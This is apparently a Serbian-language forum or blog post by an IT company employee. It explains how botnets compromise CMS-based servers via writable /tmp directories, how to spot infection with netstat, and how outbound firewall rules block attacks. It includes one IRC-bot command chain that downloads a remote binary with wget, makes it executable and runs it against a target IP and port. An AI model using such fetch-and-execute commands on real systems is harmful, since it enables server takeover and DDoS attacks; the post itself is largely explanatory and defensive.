Da bi bili sigurni da vas racunar nije zarazen nekim virusom koji napada druge racunare otvorite cmd i kucajte netstat ukoliko nadjete zahtev SYN_SEND na mnogo adresa, znaci da ste zarazeni.
Inace napraviti botnet je veoma jednostavno.. I ne zahteva neki filozofiju. Razlikuju se 2 vrste botnet obicnih korisnika (kucni racunari sa slabim uploadom do 1mbps) serveri sa 10,100 ili vise mbps uploada.
Za obaranje 1 sajta dovoljan vam je ponekad i 1 - 2 servera. Nema neke velike filozofije kako "zaraziti server" mnoge skripte ili CMS sistemi (joomla ili mambo itd..) imaju pristup pisanju u /tmp direktorijum gde upisuju sesije i stvari koje su im trenutno potrebne.
Sa rupom u kodu ljudi naprave exploit gde se uz odredjene http zahteve na CMS postavi bot koji se konektuje na irc mrezu i kontrolise se globalno ( botovi u jednom kanalu) primaju komande tipa .unixkomada. Recimo .wget
http://IP/~test/stealth; .chmod +x stealth; ./stealth IP port
Ovo je veoma mocna alatka za napadanje. Krivci za ovaj propust na serveru su prvobitno autori cms sistema ali posto je to besplatan software na administratoru sistema je da se bolje zastiti od ovih upada. A da svoj server zastiti od mogucnosti da napada druge racunare najbolje je da doda pravilo u fw da zabrani slanje sa servera na sve portove a da dozvoli na one koji su potrebni.
Ovo je output kada pokusate da saljete sa servera, pokrenuo sam nmap, ip koji sam skenirao cu zamaskirati zvezdama.
sendto in send_ip_packet: sendto(5, packet, 44, 0, *.*.*.*, 16) => Operation not permitted
sendto in send_ip_packet: sendto(5, packet, 44, 0, *.*.*.*, 16) => Operation not permitted
sendto in send_ip_packet: sendto(5, packet, 44, 0, *.*.*.*, 16) => Operation not permitted
sendto in send_ip_packet: sendto(5, packet, 44, 0, *.*.*.*, 16) => Operation not permitted
sendto in send_ip_packet: sendto(5, packet, 44, 0, *.*.*.*, 16) => Operation not permitted
Ko nije znao nadam se da sada malo vise razume u vezi ovih napada. Jos jedna stvar mnogi ljudi mesaju DoS i DDoS napad je isti razlika je sto se prvi napad izvrsava sa 1 adrese a drugi napad je sinhronizovan napad (isto vreme u sekudni! :) ) vise adresa sto sama rec distributed govori.
Danijel,
http://www.adiswitch.com/
---------------------------------------
Na društvenim mrežama.
http://www.facebook.com/adiswitchdoo
https://twitter.com/#!/adiswitch
---------------------------------------